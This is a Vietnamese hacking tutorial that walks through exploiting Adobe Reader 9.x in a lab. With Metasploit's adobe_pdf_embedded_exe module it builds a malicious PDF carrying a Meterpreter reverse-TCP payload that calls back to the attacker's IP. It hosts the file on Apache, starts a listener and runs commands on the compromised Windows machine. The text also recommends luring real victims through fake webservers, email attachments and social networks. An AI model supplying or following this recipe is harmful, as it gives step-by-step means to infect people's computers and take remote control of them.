Xâm nhập vào máy tính khi máy tính này sử dụng Adobe Reader 9x

Các bạn tham khảo thêm lỗi này tại:

http://www.adobe.com/support/security/advisories/apsa11-04.html

Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một Webserver giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, quăng lên các mạng xã hội, các nơi tải file …) và máy nạn nhân đang sử dụng AdobeReader 9.x. máy nạn nhân sẽ bị “nhiễm độc”.

Mô hình bài Lab

Máy Hacker:

Hệ điều hành: Sử dụng Backtrack 5

IP: 192.168.119.132

Máy nạn nhân:

Hệ điều hành: Sử dụng Windows XP

IP: 192.168.119.129

Cách khai thác:

Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole

Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf

msf > search adobe_pdf

copy đường dẫn, ở đây ta sử dụng adobe_pdf_embedded_exe,  enter gõ use “dán đường dẫn vào”

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Gõ lệnh show options để thấy những option của lỗi

msf  exploit(adobe_pdf_embedded_exe) > show options

Ở đây ta thấy bắt buộc phải tạo INFILENAME

Lần lượt gõ các lệnh:

msf  exploit(adobe_pdf_embedded_exe) > set filename filemadoc.pdf

Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình có sẵn 1 file infilename.pdf ngoài Desktop.

msf  exploit(adobe_pdf_embedded_exe) > set infilename /root/Desktop/infilename.pdf

msf  exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.119.132

Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack.

msf  exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp

msf  exploit(adobe_pdf_embedded_exe) > exploit

Ta sẽ thấy có một file filemadoc.pdf được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích), ta copy file “filemadoc.pdf” đã được tạo ra ngoài Desktop cho dễ sử dụng.

msf  exploit(adobe_pdf_embedded_exe) > cp /root/.msf4/local/filemadoc.pdf /root/Desktop

Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một Webserver để nạn nhân truy cập vào. Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta chỉ việc chạy.

Upload file “filemadoc.pdf” lên Webserver bằng cách đưa nó vào thư mục “/var/www”

Start Webserver ảo bằng lệnh (mở một cửa số cmd khác).

root@bt:~# service apache2 start

 * Starting web server apache2                                           [ OK ]

Giờ ta qua máy nạn nhân truy cập vào Webserver ta đã dựng và tải file “filemadoc.doc” về.

Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào.

Tạo ra một trình lắng nghe

msf  exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler

msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf  exploit(handler) >set LHOST 192.168.119.132

msf  exploit(handler) > exploit

Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn nhân

Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1210

Giờ ta có thể khai thác được máy nạn nhân

Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã hoàn toàn kiểm xoát được máy nạn nhân.

Thanks!.